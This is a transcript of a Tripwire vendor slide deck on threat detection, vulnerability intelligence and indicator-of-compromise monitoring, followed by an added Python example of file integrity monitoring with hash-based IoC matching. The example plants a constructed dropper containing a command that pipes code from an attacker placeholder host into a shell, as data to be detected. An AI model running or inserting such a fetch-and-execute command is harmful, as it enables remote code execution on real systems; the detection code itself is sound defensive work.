Tripwire Adaptive Threat Protection

Date posted: 02-Aug-2015
Uploaded by: tripwire

Transcript

Adaptive Threat Protection

Dwayne Melancon, CISA
CTO and VP of Research & Development

2

Threat Landscape

85%: percentage of breaches that could be prevented by remediating known vulnerabilities (US-CERT)

205 days: average time to detect an advanced persistent threat on a corporate network (Mandiant)

94%: percentage of unauthorized data access that was through compromised servers (Verizon DBIR)

> 123 days: days the average malicious data breach took to resolve (Ponemon)

3

The Information Security Landscape: data, data everywhere, and not a drop of context

Endpoint Configurations

Vulnerability Results

Threat Intelligence

Logs & Events

BIG DATA

4

Enterprise Cyberthreat Gap

Detection Gap: time between the actual breach and its discovery. (Have we been breached?)

Response Gap: time between discovery and remediation to limit damage. (How bad is it?)

Prevention Gap: time to put preventative measures in place to avoid future attacks. (Can we prevent this from happening again?)

5

Tough Challenge to Close the Cyberthreat Gap

Advanced attacks: harder to detect, and compromises happen faster

Limited resources and time: need better prioritization. What is at risk? What do I fix first?

Limited context from fragmented tools: need high-confidence, actionable information

6

Solution: Adaptive Threat Protection

Adaptive Threat Protection brings together:

Endpoint Intelligence

Vulnerability Intelligence

Threat Intelligence

Log & Event Intelligence

Threat Analytics

Forensics

Zero-Day Detection

Threat Response

8

Balanced Proactive and Reactive Security Controls

Agent-based "inside-out" visibility: file integrity monitoring (good changes and bad changes)

Agent-less "outside-in" visibility: device and application discovery, vulnerability assessment, web app vulnerabilities

9

Delivering Adaptive Threat Protection

The new integration between Tripwire IP360 and Tripwire Enterprise delivers the unique value of Adaptive Threat Protection:

Continuous analysis of an organization's attack surface

Continuous security control automation

Significant reduction of overall cyberthreat risk

10

The High Cost of Manual Effort (other vulnerability management solutions)

1. Scan: scan your environment, find assets and vulnerabilities; limited results

2. Report: produce a PDF report; manually prioritize vulnerability results; hand off results to others

3. Combine: manually correlate vulnerability results to assets in Tripwire Enterprise; manually configure Tripwire Enterprise monitoring based on an outdated threat landscape

4. React: detect and respond to threats, harden critical systems at risk, manually or through Tripwire Enterprise automation

11

Reduce the Threat Gap with Vulnerability Intelligence

1. Profile: use Tripwire IP360 to comprehensively profile the assets for vulnerabilities and applications

2. Prioritize: use factors such as the Tripwire IP360 score and risk matrix to prioritize vulnerability risk

3. Adapt: dynamically adapt Tripwire Enterprise monitoring based on the changing threat landscape

4. Respond: detect and respond to threats, harden critical systems at risk, manually or through Tripwire Enterprise automation

12

Summary

Accelerated Threat Response by automatically applying Tripwire Enterprise policies and actions based on vulnerability intelligence (Response Gap).

Faster Threat Detection by automatically delivering prioritized vulnerability intelligence to Tripwire Enterprise (Detection Gap).

Effective Threat Prevention by automatically correlating vulnerability intelligence to business context (Prevention Gap).

Threat Intelligence

14

Advanced Threat Detection

Identify all changes to high value systems

Investigate each change, determine if it is suspicious

Kick-off an incident response workflow

15

Advanced Threat Detection

Investigate each change, determine if it is suspicious

Tripwire Enterprise customers are already doing this today

Threat Intelligence adds threat context to dramatically improve the efficiency of this step

16

Threat Intelligence Integration Use Cases

Malware Identification: identify known malware on assets with a Tripwire Enterprise agent through integration with threat intelligence partners.

Identify Zero-Days and Unknown Threats: identify zero-days and previously unknown threats by 'detonating' executable files in partner sandboxes for analysis.

Monitoring for Peer, Community and Commercial IoCs: automate the forensic investigation and proactive monitoring of high-risk assets for indicators of compromise sourced from threat intelligence services.

17 TRIPWIRE PROPRIETARY & CONFIDENTIAL. NOT FOR DISTRIBUTION

Identify Known Malware

1. Identify files on critical assets

2. Send file hashes to partner for analysis

3. Update controls based on identified malware

Automated threat identification; real-time file monitoring; support for multiple threat intelligence vendors; automates analysis; identifies known and unknown threats.

18

Identify Zero Days and Suspicious Files

1. Identify suspicious files on critical assets

2. Send the whole file for 'detonation' and analysis

3. Update controls based on identified threats

19

Monitor for Indicators of Compromise

1. Obtain IoCs from threat intelligence vendor(s)

2. Import IoCs into Tripwire Enterprise for monitoring

3. Update controls based on identified indicators
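The "Identify Known Malware" and "Monitor for Indicators of Compromise" slides above describe the same mechanism from two sides: a file integrity monitor records which files on a critical asset changed, and the hashes of the changed files are compared against indicators supplied by a threat intelligence feed. The following is an added example written for this page, not Tripwire Enterprise code or any vendor's integration; the directory layout, the planted dropper, and the IoC hash set are all constructed here, and the function names (hash_tree, diff_baseline, match_iocs) are hypothetical.

```python
"""Added example: minimal file-integrity monitoring plus IoC hash lookup.
Not Tripwire code; all paths, file contents and IoC values are constructed."""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

# Constructed IoC feed: SHA-256 digests of known-bad files, in the form a
# threat intelligence vendor might export.  The first entry is the digest of
# the constructed dropper planted by demo() below; the second is a filler
# indicator that never matches anything.
IOC_HASHES = {
    hashlib.sha256(b"#!/bin/sh\ncurl http://attacker.example/x | sh\n").hexdigest(),
    "0" * 64,
}


def sha256_file(path: str, chunk: int = 65536) -> str:
    """Stream a file through SHA-256 so large binaries never sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hash_tree(root: str) -> Dict[str, str]:
    """Step 1: baseline a critical asset as {relative path: digest}."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def diff_baseline(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every change since the last baseline, good and bad alike."""
    return {
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
        "modified": sorted(p for p in new if p in old and new[p] != old[p]),
    }


def match_iocs(new: Dict[str, str], changes: Dict[str, List[str]],
               iocs: set) -> List[Tuple[str, str]]:
    """Steps 2-3: look up digests of added or modified files in the IoC set.
    Only changed files are checked; unchanged files passed the previous round,
    which is what keeps the investigation step cheap."""
    return [(p, new[p]) for p in changes["added"] + changes["modified"]
            if new[p] in iocs]


def demo() -> dict:
    """Constructed end-to-end run: baseline, a legitimate edit, a planted dropper."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, "etc", "app.conf"), "w") as f:
            f.write("level=info\n")
        with open(os.path.join(root, "etc", "motd"), "w") as f:
            f.write("welcome\n")
        baseline = hash_tree(root)

        # Legitimate config change, a removed file, and a dropped shell script
        # whose digest appears in the constructed IoC feed.
        with open(os.path.join(root, "etc", "app.conf"), "w") as f:
            f.write("level=debug\n")
        os.remove(os.path.join(root, "etc", "motd"))
        os.makedirs(os.path.join(root, "tmp"))
        with open(os.path.join(root, "tmp", ".x.sh"), "wb") as f:
            f.write(b"#!/bin/sh\ncurl http://attacker.example/x | sh\n")

        current = hash_tree(root)
        changes = diff_baseline(baseline, current)
        hits = match_iocs(current, changes, IOC_HASHES)
    return {"changes": changes, "ioc_hits": hits}


if __name__ == "__main__":
    result = demo()
    for kind, paths in result["changes"].items():
        print(f"{kind}: {paths}")
    for path, digest in result["ioc_hits"]:
        print(f"ALERT known-bad file {path} sha256={digest}")
```

The config edit shows up as a change but produces no alert, while the dropper is flagged because its digest matches an indicator: that split between "every change is recorded" and "only IoC matches demand attention" is the efficiency gain the slides attribute to adding threat context to change investigation. A real deployment would also compare against indicators other than whole-file hashes (paths, registry keys, network destinations) and would not trust a hash list that arrived over an unauthenticated channel.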

20

Open Threat Intelligence Integration: enabling zero-day and advanced threat detection and response across the Detection Gap, Response Gap and Prevention Gap

tripwire.com | @TripwireInc

THANK YOU

